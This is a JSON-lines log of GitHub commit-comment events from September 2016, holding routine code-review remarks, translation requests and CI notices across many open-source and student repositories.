{"id":"4582635126","type":"CommitCommentEvent","actor":{"login":"estolfo"},"repo":{"name":"mongodb/mongoid"},"payload":{"comment":{"id":19076885,"position":null,"line":null,"path":null,"commit_id":"3e87dab878847e0bdddcc3289d9de96cc04344e4","created_at":"2016-09-19T11:03:17Z","updated_at":"2016-09-19T11:03:17Z","body":"Can you share show code that shows the bug so I can test it as well?"}},"created_at":"2016-09-19T11:03:17Z"}
{"id":"4582635844","type":"CommitCommentEvent","actor":{"login":"rascarlo"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19076886,"position":20,"line":24,"path":"values-de/settings_strings.xml","commit_id":"77a381e127b5cf45ccf074947cfc1f644bcb2dc2","created_at":"2016-09-19T11:03:28Z","updated_at":"2016-09-19T11:03:28Z","body":"@Garduna1976 is this the correct translation for the english Dutch?"}},"created_at":"2016-09-19T11:03:28Z"}
{"id":"4582636731","type":"CommitCommentEvent","actor":{"login":"walro"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19076889,"position":null,"line":null,"path":null,"commit_id":"f2b7124374a1d2d8dd60844a07514f2752e50d3c","created_at":"2016-09-19T11:03:41Z","updated_at":"2016-09-19T11:03:41Z","body":"@tdsmith at least \"zabbix-api\", \"xmltodict\" and \"pywinrm\" were lost in the sort, possibly more.\r\n\r\n> 293 additions and 336 deletions."}},"created_at":"2016-09-19T11:03:41Z"}
{"id":"4582638152","type":"CommitCommentEvent","actor":{"login":"saaj"},"repo":{"name":"bcb/jsonrpcclient"},"payload":{"comment":{"id":19076891,"position":null,"line":null,"path":null,"commit_id":"6196d5fa5f10cfbfcf093021e74742c80d9d171e","created_at":"2016-09-19T11:04:05Z","updated_at":"2016-09-19T11:04:05Z","body":"Also in semver it doesn't seem like a good idea to deprecate things in a patch release. Minor or major release look like better options."}},"created_at":"2016-09-19T11:04:05Z"}
{"id":"4582641040","type":"CommitCommentEvent","actor":{"login":"rascarlo"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19076894,"position":105,"line":82,"path":"values-de/settings_strings.xml","commit_id":"77a381e127b5cf45ccf074947cfc1f644bcb2dc2","created_at":"2016-09-19T11:04:33Z","updated_at":"2016-09-19T11:04:33Z","body":"@Garduna1976 added lines 82 to 87 to be translated"}},"created_at":"2016-09-19T11:04:33Z"}
{"id":"4582642242","type":"CommitCommentEvent","actor":{"login":"Girish-K"},"repo":{"name":"Girish-K/react-numeric-input"},"payload":{"comment":{"id":19076896,"position":null,"line":null,"path":null,"commit_id":"846836218126ecbbd2ac26ad37d3a46100874fe9","created_at":"2016-09-19T11:04:52Z","updated_at":"2016-09-19T11:04:52Z","body":"Fixed the read-only issue also in new update."}},"created_at":"2016-09-19T11:04:52Z"}
{"id":"4582646645","type":"CommitCommentEvent","actor":{"login":"mandelsoft"},"repo":{"name":"cloudfoundry-incubator/spiff"},"payload":{"comment":{"id":19076909,"position":null,"line":null,"path":null,"commit_id":"284a427ed779beffab75c698727723a712a310c4","created_at":"2016-09-19T11:06:04Z","updated_at":"2016-09-19T11:06:04Z","body":"Hi Amit,\r\n\r\nI don't think, that this syntax is a good idea. It uses a typical `NOT` operator for a different purpose as part of\r\na regular expression syntax and therefore prevents the use of such an operator as part of an expression. A better way would be to escape the complete expression denotation, for example\r\n`~(( foo.bar ))`\r\nThis would not concflict with the expression itself. Ok, the `!` character cannot be used here, because it is \r\npart of the yaml syntax. By the way, this would even don't need any implementation, because such a string is not handled as expression at all.\r\n\r\nRegards\r\nUwe\r\n"}},"created_at":"2016-09-19T11:06:04Z"}
{"id":"4582647517","type":"CommitCommentEvent","actor":{"login":"rascarlo"},"repo":{"name":"TilesLocalization/resources"},"payload":{"comment":{"id":19076910,"position":null,"line":null,"path":null,"commit_id":"77a381e127b5cf45ccf074947cfc1f644bcb2dc2","created_at":"2016-09-19T11:06:17Z","updated_at":"2016-09-19T11:06:17Z","body":"@marci4 @Garduna1976 please check added resources to be translated.\r\nsettings_strings: line 24, lines 82 to 87.\r\nThanks again."}},"created_at":"2016-09-19T11:06:17Z"}
{"id":"4582648727","type":"CommitCommentEvent","actor":{"login":"cloud4every1"},"repo":{"name":"cloud4every1/hello-world"},"payload":{"comment":{"id":19076917,"position":null,"line":null,"path":null,"commit_id":"5449791bce5b4ce5e21768a2bf9811d163b97891","created_at":"2016-09-19T11:06:36Z","updated_at":"2016-09-19T11:06:36Z","body":"perfectly done"}},"created_at":"2016-09-19T11:06:36Z"}
{"id":"4582651304","type":"CommitCommentEvent","actor":{"login":"Nimeesh"},"repo":{"name":"Nimeesh/Test"},"payload":{"comment":{"id":19076922,"position":null,"line":null,"path":null,"commit_id":"4d619d7a70c1b258ae179dd999e5c410a7935c41","created_at":"2016-09-19T11:07:16Z","updated_at":"2016-09-19T11:07:16Z","body":"this is old commit and may not have existing thread. check this flow."}},"created_at":"2016-09-19T11:07:16Z"}
{"id":"4582654092","type":"CommitCommentEvent","actor":{"login":"revolter"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":19076926,"position":4,"line":862,"path":"src/MainWindow.cpp","commit_id":"55d8905b904ac57cf759db3b235b1ce27ab8c8a5","created_at":"2016-09-19T11:08:02Z","updated_at":"2016-09-19T11:08:02Z","body":"It looks like this read all the text, not just one line, but when executing it, `singleStep` being set to `true`, it `break`s from [this `do ... while` loop][1].\r\n\r\nSo, indeed, as @chrisjlocke pointed out [in this answer][2], it executed only the first SQL, but printed all the text to the console.\r\n\r\n@sqlitebrowser/developers, If we do want to execute the first SQL and __not__ the first text line, I think I have a solution for this. If not, we can have the `Execute current line` button to execute the current ... line 😄 \r\n\r\n  [1]: https://github.com/sqlitebrowser/sqlitebrowser/blob/55d8905b904ac57cf759db3b235b1ce27ab8c8a5/src/MainWindow.cpp#L904-L989\r\n  [2]: https://github.com/sqlitebrowser/sqlitebrowser/issues/741#issuecomment-246054024"}},"created_at":"2016-09-19T11:08:02Z"}
{"id":"4582656120","type":"CommitCommentEvent","actor":{"login":"carlson"},"repo":{"name":"mongodb/mongoid"},"payload":{"comment":{"id":19076931,"position":null,"line":null,"path":null,"commit_id":"3e87dab878847e0bdddcc3289d9de96cc04344e4","created_at":"2016-09-19T11:08:35Z","updated_at":"2016-09-19T11:08:35Z","body":"Will do. FYI: best I can tell it happens whenever the related data has some nil values.\n\n- Eric\n\n> On Sep 19, 2016, at 7:03 AM, Emily S <notifications@github.com> wrote:\n> \n> Can you share show code that shows the bug so I can test it as well?\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/mongodb/mongoid/commit/3e87dab878847e0bdddcc3289d9de96cc04344e4#commitcomment-19076885>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AADsI7xnTaqi0WKZe1y9EfWF8EA0HtT9ks5qrmv2gaJpZM4KAXPa>.\n> \n\n"}},"created_at":"2016-09-19T11:08:35Z"}
{"id":"4582657490","type":"CommitCommentEvent","actor":{"login":"Nimeesh"},"repo":{"name":"Nimeesh/Test"},"payload":{"comment":{"id":19076932,"position":null,"line":null,"path":null,"commit_id":"4d619d7a70c1b258ae179dd999e5c410a7935c41","created_at":"2016-09-19T11:08:57Z","updated_at":"2016-09-19T11:08:57Z","body":"one more update"}},"created_at":"2016-09-19T11:08:57Z"}
{"id":"4582658713","type":"CommitCommentEvent","actor":{"login":"mkroon1"},"repo":{"name":"LOVDnl/LOVD3"},"payload":{"comment":{"id":19076934,"position":13,"line":39,"path":"src/class/objects.php","commit_id":"c46eda4736075e6766adaa264c518909daefc1f2","created_at":"2016-09-19T11:09:17Z","updated_at":"2016-09-19T11:09:17Z","body":"The function I'm using here  (`lovd_getCategoryCustomColFromName`) is actually used only once in the code, and only for objects of class `LOVD_CustomViewList` when doing find and replace. So we might just require it there where the function is used."}},"created_at":"2016-09-19T11:09:17Z"}
{"id":"4582660968","type":"CommitCommentEvent","actor":{"login":"akelmanson"},"repo":{"name":"k0kubun/hamlit"},"payload":{"comment":{"id":19076941,"position":9,"line":15,"path":"lib/hamlit/rails_template.rb","commit_id":"f28de6fa1ba58f20848d465a332568c1877787b0","created_at":"2016-09-19T11:09:55Z","updated_at":"2016-09-19T11:09:55Z","body":"It leads to this warning:\r\n\r\n`Hamlit::Engine: Option :buffer_class is invalid`"}},"created_at":"2016-09-19T11:09:55Z"}
{"id":"4582662262","type":"CommitCommentEvent","actor":{"login":"Nimeesh"},"repo":{"name":"Nimeesh/Test"},"payload":{"comment":{"id":19076946,"position":null,"line":null,"path":null,"commit_id":"a9a95cacc7127326bbb4455a6f3ea6b33f4455f0","created_at":"2016-09-19T11:10:17Z","updated_at":"2016-09-19T11:10:17Z","body":"now check this subject change"}},"created_at":"2016-09-19T11:10:17Z"}
{"id":"4582663546","type":"CommitCommentEvent","actor":{"login":"flash-gordon"},"repo":{"name":"dry-rb/dry-monads"},"payload":{"comment":{"id":19076948,"position":null,"line":null,"path":null,"commit_id":"a6eac3e47b9ad1815be0a59d695b6ece351b1c2f","created_at":"2016-09-19T11:10:35Z","updated_at":"2016-09-19T11:10:35Z","body":"@kke @backus is correct, we don't run specs against ruby 2.0, so we can't guarantee whether it works or not"}},"created_at":"2016-09-19T11:10:35Z"}
{"id":"4582664749","type":"CommitCommentEvent","actor":{"login":"jarofgreen"},"repo":{"name":"OpenACalendar/OpenACalendar-Web-Core"},"payload":{"comment":{"id":19076950,"position":null,"line":null,"path":null,"commit_id":"60b8f7acb0c0a419954b2148c412e1ab15052896","created_at":"2016-09-19T11:10:55Z","updated_at":"2016-09-19T11:10:55Z","body":"https://github.com/OpenACalendar/OpenACalendar-Web-Core/issues/576  I HATE COPY AND PASTE"}},"created_at":"2016-09-19T11:10:55Z"}
{"id":"4582664878","type":"CommitCommentEvent","actor":{"login":"nogueirasjorge"},"repo":{"name":"nogueirasjorge/histora-project"},"payload":{"comment":{"id":19076951,"position":89,"line":null,"path":"app/src/main/assets/model.json","commit_id":"630358972435f24b8d9abb05eb58baeaab06672e","created_at":"2016-09-19T11:10:57Z","updated_at":"2016-09-19T11:10:57Z","body":"At the moment we do not need to force audio files in the last point, as you can see in the Invasiones Inglesas campaign. This can be erased."}},"created_at":"2016-09-19T11:10:57Z"}
{"id":"4582667963","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19076961,"position":null,"line":null,"path":null,"commit_id":"5bec328f2edfb9c36bfe2fbf28b433b7b92c8463","created_at":"2016-09-19T11:11:47Z","updated_at":"2016-09-19T11:11:47Z","body":"@MichaelWallace30 \r\nI'll tru to add options in the main directory CMakeLists file to compile the csharp lib autonomously, soon. This will simplify this process much better."}},"created_at":"2016-09-19T11:11:47Z"}
{"id":"4582668497","type":"CommitCommentEvent","actor":{"login":"k0kubun"},"repo":{"name":"k0kubun/hamlit"},"payload":{"comment":{"id":19076963,"position":9,"line":15,"path":"lib/hamlit/rails_template.rb","commit_id":"f28de6fa1ba58f20848d465a332568c1877787b0","created_at":"2016-09-19T11:11:56Z","updated_at":"2016-09-19T11:11:56Z","body":"You are right. Fixed it in https://github.com/k0kubun/hamlit/commit/b196cb239ad7cb27d739be8f2e15bcaac13a656c."}},"created_at":"2016-09-19T11:11:56Z"}
{"id":"4582680953","type":"CommitCommentEvent","actor":{"login":"stefaniacardenas"},"repo":{"name":"harveyjohal/ruby-course"},"payload":{"comment":{"id":19076992,"position":31,"line":31,"path":"challenges/homework_2.rb","commit_id":"683268c3087cfa5fdd1fe0e90d74f7463a378ddd","created_at":"2016-09-19T11:15:13Z","updated_at":"2016-09-19T11:15:13Z","body":"Can you add a comment to explain what's happening in this line?"}},"created_at":"2016-09-19T11:15:13Z"}
{"id":"4582682759","type":"CommitCommentEvent","actor":{"login":"zhangxinyu0702"},"repo":{"name":"zhangxinyu0702/hello-world"},"payload":{"comment":{"id":19076993,"position":null,"line":null,"path":null,"commit_id":"e5c59a75ef075fbc0adacce3119a79c719b7df50","created_at":"2016-09-19T11:15:39Z","updated_at":"2016-09-19T11:15:39Z","body":"~~~~"}},"created_at":"2016-09-19T11:15:39Z"}
{"id":"4582683573","type":"CommitCommentEvent","actor":{"login":"stefaniacardenas"},"repo":{"name":"harveyjohal/ruby-course"},"payload":{"comment":{"id":19076996,"position":22,"line":22,"path":"challenges/homework_2.rb","commit_id":"683268c3087cfa5fdd1fe0e90d74f7463a378ddd","created_at":"2016-09-19T11:15:52Z","updated_at":"2016-09-19T11:15:52Z","body":"Can you add a comment explaining what this line does?"}},"created_at":"2016-09-19T11:15:52Z"}
{"id":"4582687758","type":"CommitCommentEvent","actor":{"login":"rinechran"},"repo":{"name":"MineScroll/Cubby"},"payload":{"comment":{"id":19077003,"position":null,"line":null,"path":null,"commit_id":"a2ef2db45268246b61e21f4a12aa1ae1a3ad86dd","created_at":"2016-09-19T11:16:57Z","updated_at":"2016-09-19T11:16:57Z","body":"Wow..."}},"created_at":"2016-09-19T11:16:57Z"}
{"id":"4582695385","type":"CommitCommentEvent","actor":{"login":"rbran"},"repo":{"name":"izanagi-sama/LabEngenhariaSuzi"},"payload":{"comment":{"id":19077021,"position":1,"line":1,"path":"etc/bd2.sql","commit_id":"f36a852e394a7d06e1b33f1f960a8f2f2351119f","created_at":"2016-09-19T11:18:57Z","updated_at":"2016-09-19T11:18:57Z","body":"Não precisa de um segundo arquivo BD2, deixa tudo em um só"}},"created_at":"2016-09-19T11:18:57Z"}
{"id":"4582696097","type":"CommitCommentEvent","actor":{"login":"rbran"},"repo":{"name":"izanagi-sama/LabEngenhariaSuzi"},"payload":{"comment":{"id":19077023,"position":5,"line":8,"path":"html/js/controller/freelancer/trabalho-concluido.js","commit_id":"f36a852e394a7d06e1b33f1f960a8f2f2351119f","created_at":"2016-09-19T11:19:10Z","updated_at":"2016-09-19T11:19:10Z","body":"O bug do FrontEnd"}},"created_at":"2016-09-19T11:19:10Z"}
{"id":"4582696976","type":"CommitCommentEvent","actor":{"login":"rbran"},"repo":{"name":"izanagi-sama/LabEngenhariaSuzi"},"payload":{"comment":{"id":19077024,"position":2,"line":2,"path":"php/freelancer/trabalho-andamento.php","commit_id":"f36a852e394a7d06e1b33f1f960a8f2f2351119f","created_at":"2016-09-19T11:19:25Z","updated_at":"2016-09-19T11:19:25Z","body":"Removido essas linha velhas"}},"created_at":"2016-09-19T11:19:25Z"}
{"id":"4582698583","type":"CommitCommentEvent","actor":{"login":"rbran"},"repo":{"name":"izanagi-sama/LabEngenhariaSuzi"},"payload":{"comment":{"id":19077029,"position":26,"line":34,"path":"php/freelancer/trabalho-andamento.php","commit_id":"f36a852e394a7d06e1b33f1f960a8f2f2351119f","created_at":"2016-09-19T11:19:51Z","updated_at":"2016-09-19T11:19:51Z","body":"Pra que tanto espaçamento @saxiro?"}},"created_at":"2016-09-19T11:19:51Z"}
{"id":"4582699249","type":"CommitCommentEvent","actor":{"login":"rbran"},"repo":{"name":"izanagi-sama/LabEngenhariaSuzi"},"payload":{"comment":{"id":19077030,"position":46,"line":53,"path":"php/freelancer/trabalho-andamento.php","commit_id":"f36a852e394a7d06e1b33f1f960a8f2f2351119f","created_at":"2016-09-19T11:20:02Z","updated_at":"2016-09-19T11:20:02Z","body":"Mais espaçamento"}},"created_at":"2016-09-19T11:20:02Z"}
{"id":"4582701870","type":"CommitCommentEvent","actor":{"login":"rbran"},"repo":{"name":"izanagi-sama/LabEngenhariaSuzi"},"payload":{"comment":{"id":19077035,"position":46,"line":53,"path":"php/freelancer/trabalho-andamento.php","commit_id":"f36a852e394a7d06e1b33f1f960a8f2f2351119f","created_at":"2016-09-19T11:20:43Z","updated_at":"2016-09-19T11:20:43Z","body":"E não precisa fazer um for, coloca tudo em trabalhos que ele depois converte em json"}},"created_at":"2016-09-19T11:20:43Z"}
{"id":"4582702603","type":"CommitCommentEvent","actor":{"login":"rbran"},"repo":{"name":"izanagi-sama/LabEngenhariaSuzi"},"payload":{"comment":{"id":19077037,"position":67,"line":70,"path":"php/freelancer/trabalho-andamento.php","commit_id":"f36a852e394a7d06e1b33f1f960a8f2f2351119f","created_at":"2016-09-19T11:20:55Z","updated_at":"2016-09-19T11:20:55Z","body":"Código morto"}},"created_at":"2016-09-19T11:20:55Z"}
{"id":"4582703381","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19077044,"position":null,"line":null,"path":null,"commit_id":"5448c328f8199d9bf4db5079af5cb12680ef4285","created_at":"2016-09-19T11:21:09Z","updated_at":"2016-09-19T11:21:09Z","body":"I guess you're right."}},"created_at":"2016-09-19T11:21:09Z"}
{"id":"4582705528","type":"CommitCommentEvent","actor":{"login":"rbran"},"repo":{"name":"izanagi-sama/LabEngenhariaSuzi"},"payload":{"comment":{"id":19077052,"position":43,"line":50,"path":"php/freelancer/trabalho-andamento.php","commit_id":"f36a852e394a7d06e1b33f1f960a8f2f2351119f","created_at":"2016-09-19T11:21:40Z","updated_at":"2016-09-19T11:21:40Z","body":"Esse else não existe, caso o BD não retornar nada significa que o freelancer não tem nenhum trabalho, não que deu erro."}},"created_at":"2016-09-19T11:21:40Z"}
{"id":"4582708624","type":"CommitCommentEvent","actor":{"login":"bloatware"},"repo":{"name":"textpattern/textpattern"},"payload":{"comment":{"id":19077059,"position":null,"line":null,"path":null,"commit_id":"4cb72a885113b467328ac7c4c82f97b7350165e1","created_at":"2016-09-19T11:22:26Z","updated_at":"2016-09-19T11:22:26Z","body":"Thanks! And wouldn't it be even better to redirect users to Diagnostics rather than Languages after update, with more information available? Or somehow merge both?"}},"created_at":"2016-09-19T11:22:26Z"}
{"id":"4582709306","type":"CommitCommentEvent","actor":{"login":"rbran"},"repo":{"name":"izanagi-sama/LabEngenhariaSuzi"},"payload":{"comment":{"id":19077060,"position":74,"line":51,"path":"etc/bd.sql","commit_id":"f36a852e394a7d06e1b33f1f960a8f2f2351119f","created_at":"2016-09-19T11:22:36Z","updated_at":"2016-09-19T11:22:36Z","body":"Quebrei a linha pra ficar mais fácil de modificar"}},"created_at":"2016-09-19T11:22:36Z"}
{"id":"4582712153","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19077065,"position":null,"line":null,"path":null,"commit_id":"79e8fff9f6ddf1f1cd7ca58d897cd7c676657584","created_at":"2016-09-19T11:23:21Z","updated_at":"2016-09-19T11:23:21Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35631/testReport/) for this commit**"}},"created_at":"2016-09-19T11:23:21Z"}
{"id":"4582713963","type":"CommitCommentEvent","actor":{"login":"rbran"},"repo":{"name":"izanagi-sama/LabEngenhariaSuzi"},"payload":{"comment":{"id":19077072,"position":29,"line":20,"path":"php/freelancer/trabalho-disponivel.php","commit_id":"f36a852e394a7d06e1b33f1f960a8f2f2351119f","created_at":"2016-09-19T11:23:47Z","updated_at":"2016-09-19T11:23:47Z","body":"Faltou o 'AS' no Sql"}},"created_at":"2016-09-19T11:23:47Z"}
{"id":"4582714198","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19077074,"position":null,"line":null,"path":null,"commit_id":"a8205bada6ea32e2d2224c896979927c66eaf899","created_at":"2016-09-19T11:23:50Z","updated_at":"2016-09-19T11:23:50Z","body":"Just updated debian packaging to make it compile. "}},"created_at":"2016-09-19T11:23:50Z"}
{"id":"4582714939","type":"CommitCommentEvent","actor":{"login":"tusharncuelogic"},"repo":{"name":"tusharncuelogic/Training-Angular"},"payload":{"comment":{"id":19077076,"position":1,"line":1,"path":"app/directives/deletebutton/deletebutton.js","commit_id":"d316e2cabc7ca2f2165e0b86a369cafeeca5c23c","created_at":"2016-09-19T11:24:03Z","updated_at":"2016-09-19T11:24:03Z","body":"@shitala-cuelogic  I am using this directive in the employees listing page for setting the custom alert text . and used $window the confirm alert. I will replace the confirm alert of material design by today .\r\n\r\n`<alert-button btn-class=\"btn btn-danger\" ng-click=\"delete(emp.id ,'Are you sure to delete the employee .?')\"></alert-button>`"}},"created_at":"2016-09-19T11:24:03Z"}
{"id":"4582715225","type":"CommitCommentEvent","actor":{"login":"rbran"},"repo":{"name":"izanagi-sama/LabEngenhariaSuzi"},"payload":{"comment":{"id":19077077,"position":29,"line":20,"path":"php/freelancer/trabalho-disponivel.php","commit_id":"f36a852e394a7d06e1b33f1f960a8f2f2351119f","created_at":"2016-09-19T11:24:08Z","updated_at":"2016-09-19T11:24:08Z","body":"E quebrei alinha tmb, assim não fica aquela linha gigante q não cabe na tela"}},"created_at":"2016-09-19T11:24:08Z"}
{"id":"4582715271","type":"CommitCommentEvent","actor":{"login":"hanadikmail"},"repo":{"name":"hanadikmail/hey-"},"payload":{"comment":{"id":19077078,"position":null,"line":null,"path":null,"commit_id":"7af861c18e6969f5d168977f490cef258c5bd742","created_at":"2016-09-19T11:24:09Z","updated_at":"2016-09-19T11:24:09Z","body":"hello"}},"created_at":"2016-09-19T11:24:09Z"}
{"id":"4582715645","type":"CommitCommentEvent","actor":{"login":"Peppuz"},"repo":{"name":"Peppuz/LupusInBot"},"payload":{"comment":{"id":19077080,"position":null,"line":null,"path":null,"commit_id":"e17aa9422bd3ffacc79d4bbfd053dd79a8edc5cd","created_at":"2016-09-19T11:24:13Z","updated_at":"2016-09-19T11:24:13Z","body":"Ups! Failed! Commiting again.\r\n"}},"created_at":"2016-09-19T11:24:13Z"}
{"id":"4582716608","type":"CommitCommentEvent","actor":{"login":"jimberloo"},"repo":{"name":"jimberloo/hello-world"},"payload":{"comment":{"id":19077082,"position":null,"line":null,"path":null,"commit_id":"3df00994f39beafb8f59d4a43db806c0353e1ec2","created_at":"2016-09-19T11:24:30Z","updated_at":"2016-09-19T11:24:30Z","body":"Ok by me"}},"created_at":"2016-09-19T11:24:30Z"}
{"id":"4582717282","type":"CommitCommentEvent","actor":{"login":"z4r4tu5tr4"},"repo":{"name":"grupy-sp/encontros"},"payload":{"comment":{"id":19077083,"position":null,"line":null,"path":null,"commit_id":"a83ab161ed06466134c7dc398be8b08ae6aaf2f8","created_at":"2016-09-19T11:24:41Z","updated_at":"2016-09-19T11:24:41Z","body":"Valeu Regis. Ia adicionar o repo, mas vc colocou <3"}},"created_at":"2016-09-19T11:24:41Z"}
{"id":"4582717861","type":"CommitCommentEvent","actor":{"login":"khurshid-alam"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19077088,"position":null,"line":null,"path":null,"commit_id":"040b8693720c1f7907fe910b65b71f06b8adf100","created_at":"2016-09-19T11:24:51Z","updated_at":"2016-09-19T11:24:51Z","body":"Anyway I changed debian/rules to ignore irrelevant code. Now it compiles ok."}},"created_at":"2016-09-19T11:24:51Z"}
{"id":"4582718398","type":"CommitCommentEvent","actor":{"login":"rbran"},"repo":{"name":"izanagi-sama/LabEngenhariaSuzi"},"payload":{"comment":{"id":19077090,"position":15,"line":31,"path":"php/planos.php","commit_id":"f36a852e394a7d06e1b33f1f960a8f2f2351119f","created_at":"2016-09-19T11:24:59Z","updated_at":"2016-09-19T11:24:59Z","body":"Assim como em trabalhos removi o else de erro em caso de retorno vazio."}},"created_at":"2016-09-19T11:24:59Z"}
{"id":"4582722601","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19077100,"position":null,"line":null,"path":null,"commit_id":"fca34f3d87ef042723ee42ceb95a49427bb12dcd","created_at":"2016-09-19T11:26:04Z","updated_at":"2016-09-19T11:26:04Z","body":"#356"}},"created_at":"2016-09-19T11:26:04Z"}
{"id":"4582723822","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":19077103,"position":null,"line":null,"path":null,"commit_id":"046a2f37a063b160d9ad9486c3d993926c7ff671","created_at":"2016-09-19T11:26:23Z","updated_at":"2016-09-19T11:26:23Z","body":"@loechel Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.namedfile/55/violations\n```\nplone/namedfile/scaling.py:173:1: C901 'DefaultImageScalingFactory.__call__' is too complex (13)\nplone/namedfile/utils/__init__.py:176:1: C901 'rotate_image' is too complex (17)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-19T11:26:23Z"}
{"id":"4582731571","type":"CommitCommentEvent","actor":{"login":"AdmiralUshakov"},"repo":{"name":"AdmiralUshakov/new"},"payload":{"comment":{"id":19077114,"position":null,"line":null,"path":null,"commit_id":"14b3f2fcd6094988bcfb438cbb15a3487dc9771b","created_at":"2016-09-19T11:28:23Z","updated_at":"2016-09-19T11:28:23Z","body":"Что-то исправил"}},"created_at":"2016-09-19T11:28:23Z"}
{"id":"4582732212","type":"CommitCommentEvent","actor":{"login":"GusCaplan"},"repo":{"name":"hydrabolt/discord.js"},"payload":{"comment":{"id":19077115,"position":8,"line":369,"path":"src/client/rest/RESTMethods.js","commit_id":"6c6da43da3b7034b00e6c2fc07b4ca0df03f4477","created_at":"2016-09-19T11:28:32Z","updated_at":"2016-09-19T11:28:32Z","body":"are you sure you didn't mean to reject here"}},"created_at":"2016-09-19T11:28:32Z"}
{"id":"4582732332","type":"CommitCommentEvent","actor":{"login":"noronha96"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":19077116,"position":null,"line":null,"path":null,"commit_id":"b727a26e1b4b88abe84a8b48208fec537db2ed43","created_at":"2016-09-19T11:28:34Z","updated_at":"2016-09-19T11:28:34Z","body":"Explanation of:\r\nGetCustomers().SingleOrDefault(c => c.Id == id)\r\n\r\nBasically you get the list of customers, then you use the method SingleOrDefault to get a single value or a default value where you abreviate every object inside of the list, meaning c is the same as a customer then you compare the id of the c object with the id argument you received in your action.\r\n\r\nSingleOrDefault => \"Returns the only element of a sequence, or a default value if the sequence is empty; \""}},"created_at":"2016-09-19T11:28:34Z"}
{"id":"4582733855","type":"CommitCommentEvent","actor":{"login":"SpadarShut"},"repo":{"name":"SpadarShut/vPause"},"payload":{"comment":{"id":19077121,"position":31,"line":143,"path":"source/js/vpause-background.js","commit_id":"426a1b93c1901b0f350420d2a41ff757fbdde725","created_at":"2016-09-19T11:28:58Z","updated_at":"2016-09-19T11:28:58Z","body":"This can be removed\r\n"}},"created_at":"2016-09-19T11:28:58Z"}
{"id":"4582734676","type":"CommitCommentEvent","actor":{"login":"AdmiralUshakov"},"repo":{"name":"AdmiralUshakov/new"},"payload":{"comment":{"id":19077124,"position":1,"line":1,"path":"hello world.txt.txt","commit_id":"14b3f2fcd6094988bcfb438cbb15a3487dc9771b","created_at":"2016-09-19T11:29:11Z","updated_at":"2016-09-19T11:29:11Z","body":"как сменить кодировку?\r\n"}},"created_at":"2016-09-19T11:29:11Z"}
{"id":"4582736670","type":"CommitCommentEvent","actor":{"login":"mkroon1"},"repo":{"name":"LOVDnl/LOVD3"},"payload":{"comment":{"id":19077129,"position":null,"line":null,"path":null,"commit_id":"60b491cbca6deccb3f0c8097e483c25afb1343dc","created_at":"2016-09-19T11:29:40Z","updated_at":"2016-09-19T11:29:40Z","body":"You're right, it never got included to the Travis tests. The test is now quite obsolete too, as `getTableAndFieldNameFromSelect()` does not exist anymore, and the replacement `getTableAndFieldNameFromViewListCols()` is much less error-prone.\r\n\r\nI will delete it."}},"created_at":"2016-09-19T11:29:40Z"}
{"id":"4582737806","type":"CommitCommentEvent","actor":{"login":"Ssshafi"},"repo":{"name":"jeedom/core"},"payload":{"comment":{"id":19077133,"position":null,"line":null,"path":null,"commit_id":"3e27fef2ea203188caf0d4b547410700d5c42ad5","created_at":"2016-09-19T11:29:57Z","updated_at":"2016-09-19T11:29:57Z","body":"Dernière coquille que j'ai vu : alert : Vous pouvez en plus choisir 4 niveau d'alertes (.....4 niveaux d'alerte...)"}},"created_at":"2016-09-19T11:29:57Z"}
{"id":"4582739079","type":"CommitCommentEvent","actor":{"login":"kaedroho"},"repo":{"name":"torchbox/verdant-rca"},"payload":{"comment":{"id":19077138,"position":2,"line":2,"path":"django-verdant/twitter/management/commands/fetch_tweets.py","commit_id":"be34af9da4b45f24684775875c32e55a89d2e18c","created_at":"2016-09-19T11:30:18Z","updated_at":"2016-09-19T11:30:18Z","body":":scream: "}},"created_at":"2016-09-19T11:30:18Z"}
{"id":"4582740353","type":"CommitCommentEvent","actor":{"login":"stephenc"},"repo":{"name":"jenkinsci/p4-plugin"},"payload":{"comment":{"id":19077140,"position":10,"line":10,"path":"src/main/java/org/jenkinsci/plugins/p4/credentials/P4Credentials.java","commit_id":"148be62e24fa50cdf53e12f4b1eb9301f2f1483f","created_at":"2016-09-19T11:30:35Z","updated_at":"2016-09-19T11:30:35Z","body":"Much better, we will need to work on moving the server specific configuration out of the credentials configuration... but that is less urgent than ensuring that the credentials are accessed and used only via their interface types (not seeing the change of use from P4BaseCredentials to the interface types in this commit though)"}},"created_at":"2016-09-19T11:30:35Z"}
{"id":"4582741949","type":"CommitCommentEvent","actor":{"login":"philwareham"},"repo":{"name":"textpattern/textpattern"},"payload":{"comment":{"id":19077143,"position":null,"line":null,"path":null,"commit_id":"4cb72a885113b467328ac7c4c82f97b7350165e1","created_at":"2016-09-19T11:30:58Z","updated_at":"2016-09-19T11:30:58Z","body":"@bloatware For 4.6.x we should leave as-is I think. For 4.7 there is an issue open to improve languages so might be worth discussing there? https://github.com/textpattern/textpattern/issues/692"}},"created_at":"2016-09-19T11:30:58Z"}
